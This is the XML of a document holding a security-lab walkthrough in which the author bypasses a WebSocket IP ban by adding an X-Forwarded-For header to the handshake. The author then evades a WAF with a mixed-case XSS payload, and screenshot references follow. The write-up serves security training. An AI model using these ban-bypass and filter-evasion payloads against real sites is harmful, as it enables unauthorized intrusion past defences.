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02 Manipulating Websocket Handshake</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Lab 2 — Manipulating the WebSocket handshake to exploit vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>🎯 Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Bypass an IP ban by manipulating the WebSocket handshake headers, then exploit XSS with an obfuscated payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>🪜 Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1 — Open Live Chat and send hello</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2 — Capture in WebSockets history</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>See `{"message":"hello"}` in Burp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 3 — Send to Repeater, test XSS payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Modify to `{"message":"&lt;img src=1 onerror='alert(1)'&gt;"}` → Send.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>**Server response:** `{"error":"Attack detected: Event handler"}` — WAF blocks it + bans IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 4 — Reconnect fails (IP banned)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 5 — Bypass IP ban via handshake</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Edit the WebSocket handshake request, add:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>X-Forwarded-For: 1.1.1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 6 — Send obfuscated XSS payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>{"message":"&lt;img src=1 oNeRrOr=alert`1`&gt;"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Mixed case on the event handler bypasses the WAF filter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 7 — XSS fires</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>✅ Result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Lab solved!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>💡 Key Takeaway</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>IP bans are bypassable with `X-Forwarded-For`. WAF keyword filters fail against case obfuscation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>image11.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5303520" cy="1385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85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image13.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5303520" cy="1876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image20.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5303520" cy="1803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image22.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5303520" cy="40712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1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image52.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5303520" cy="13523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2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image68.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5303520" cy="12663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6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image7.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5303520" cy="1640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4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image74.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5303520" cy="15910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image87.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5303520" cy="14021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0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image89.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5303520" cy="29085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85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